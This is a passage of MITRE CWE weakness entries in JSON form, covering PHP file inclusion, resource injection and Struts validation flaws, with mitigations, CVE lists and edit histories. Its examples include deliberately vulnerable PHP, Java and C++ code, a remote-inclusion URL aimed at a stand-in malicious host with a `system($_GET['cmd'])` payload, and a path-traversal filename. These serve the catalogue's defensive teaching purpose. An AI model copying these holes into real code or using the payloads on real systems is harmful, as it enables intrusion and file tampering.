Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent lists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":{"xhtml:p":["When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.","Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009."]}},{"Phase":"Operation","Strategy":"Environment Hardening","Description":"Set allow_url_fopen to false, which limits the ability to include files from remote locations.","Effectiveness":"High","Effectiveness_Notes":"Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied \'module_name\' parameter and appending the string \'/function.php\' to it.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$dir = $_GET[\'module_name\'];include($dir . \\"/function.php\\");","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"victim.php?module_name=http://malicious.example.com"},{"attr":{"@_Nature":"bad"},"xhtml:div":"system($_GET[\'cmd\']);"},{"attr":{"@_Nature":"attack"},"xhtml:div":"victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l"},{"attr":{"@_Nature":"attack"},"xhtml:div":"/bin/ls -l"}],"Body_Text":["The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the \'module_name\' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a \'module_name\' of \\"http://malicious.example.com\\" by using the following request string:","Upon receiving this request, the code would set \'module_name\' to the value \\"http://malicious.example.com\\" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.","For the sake of this example, assume that the malicious version of function.php looks like the following:","An attacker could now go a step further in our example and provide a request string as follows:","The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the \'cmd\' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case:","Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0285","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285"},{"Reference":"CVE-2004-0030","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030"},{"Reference":"CVE-2004-0068","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068"},{"Reference":"CVE-2005-2157","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157"},{"Reference":"CVE-2005-2162","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162"},{"Reference":"CVE-2005-2198","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198"},{"Reference":"CVE-2004-0128","Description":"Modification of assumed-immutable variable in configuration script leads to file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128"},{"Reference":"CVE-2005-1864","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864"},{"Reference":"CVE-2005-1869","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869"},{"Reference":"CVE-2005-1870","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870"},{"Reference":"CVE-2005-2154","Description":"PHP local file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154"},{"Reference":"CVE-2002-1704","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704"},{"Reference":"CVE-2002-1707","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707"},{"Reference":"CVE-2005-1964","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964"},{"Reference":"CVE-2005-1681","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681"},{"Reference":"CVE-2005-2086","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086"},{"Reference":"CVE-2004-0127","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127"},{"Reference":"CVE-2005-1971","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971"},{"Reference":"CVE-2005-3335","Description":"PHP file inclusion issue, both remote and local; local include uses \\"..\\" and \\"%00\\" characters as a manipulation, but many remote file inclusion issues probably have this vector.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335"},{"Reference":"CVE-2009-1936","Description":"chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PHP File Include"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":5,"Entry_Name":"Remote File Inclusion"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"193"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-185"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-951"}},{"attr":{"@_External_Reference_ID":"REF-952"}},{"attr":{"@_External_Reference_ID":"REF-953"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role.","Can overlap directory traversal in local inclusion problems."]},{"#text":"Under-researched and under-reported. Other interpreted languages with \\"require\\" and \\"include\\" functionality could also product vulnerable applications, but as of 2007, PHP has been the focus. Any web-accessible language that uses executable file extensions is likely to have this type of issue, such as ASP, since .asp extensions are typically executable. Languages such as Perl are less likely to exhibit these problems because the .pl extension isn\'t always configured to be executable by the web server.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Importance":"Critical","Modification_Comment":"converted from Compound_Element to Weakness"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"PHP File Inclusion","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Filename for Include/Require Statement in PHP Program (aka \'PHP File Inclusion\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Control of Filename for Include/Require Statement in PHP Program (\'PHP File Inclusion\')","attr":{"@_Date":"2013-02-21"}}]}},"99":{"attr":{"@_ID":"99","@_Name":"Improper Control of Resource Identifiers (\'Resource Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.","Extended_Description":{"xhtml:p":["A resource injection issue occurs when the following two conditions are met:","This may enable an attacker to access or modify otherwise protected system resources."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.","By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"706","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"73","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Insecure Direct Object Reference","Description":"OWASP uses this term, although it is effectively the same as resource injection."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Read Files or Directories","Modify Files or Directories"],"Note":"An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, it can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"Intro_Text":"The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"ifstream ifs(argv[0]);string s;ifs >> s;cout << s;","xhtml:br":["","",""]}},"Body_Text":"The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name \\"path manipulation.\\") Similarly, data that contains URLs and URIs is risky for functions that create remote connections."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Resource Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-99"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"240"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-99"}}]},"Notes":{"Note":[{"#text":"Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).","attr":{"@_Type":"Relationship"}},{"#text":"The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 \\"Resource Injection,\\" as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the \\"identifier used to access a system resource\\" such as a file name or port number, yet it explicitly states that the \\"resource injection\\" term does not apply to \\"path manipulation,\\" which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Alternate_Terms, Description, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Other_Notes, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Resource Identifiers (aka \'Resource Injection\')","attr":{"@_Date":"2009-05-27"}}]}},"102":{"attr":{"@_ID":"102","@_Name":"Struts: Duplicate Validation Forms","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.","Extended_Description":"If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer\'s expectations, possibly leading to resultant weaknesses. Moreover, it indicates that the validation logic is not up-to-date, and can indicate that other, more subtle validation errors are present.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"694","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"The DTD or schema validation will not catch the duplicate occurrence of the same form name. To find the issue in the implementation, manual checks or automated static analysis could be applied to the xml configuration files."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Two validation forms with the same name.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<form-validation></form-validation>","xhtml:div":{"#text":"<formset></formset>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<form name=\\"ProjectForm\\"> ... </form><form name=\\"ProjectForm\\"> ... </form>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"It is critically important that validation logic be maintained and kept in sync with the rest of the application."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Duplicate Validation Forms"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Background_Details, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"103":{"attr":{"@_ID":"103","@_Name":"Struts: Incomplete validate() Method Definition","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().","Extended_Description":"If the code does not call super.validate(), the Validation Framework cannot check the contents of the form against a validation form. In other words, the validation framework will be disabled for the given form.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The Struts Validator uses a form\'s validate() method to check the contents of the form properties against the constraints specified in the associated validation form. That means the following classes have a validate() method that is part of the validation framework: ValidatorForm, ValidatorActionForm, DynaValidatorForm, and DynaValidatorActionForm. If the code creates a class that extends one of these classes, and if that class implements custom validation logic by overriding the validate() method, the code must call super.validate() in the validate() 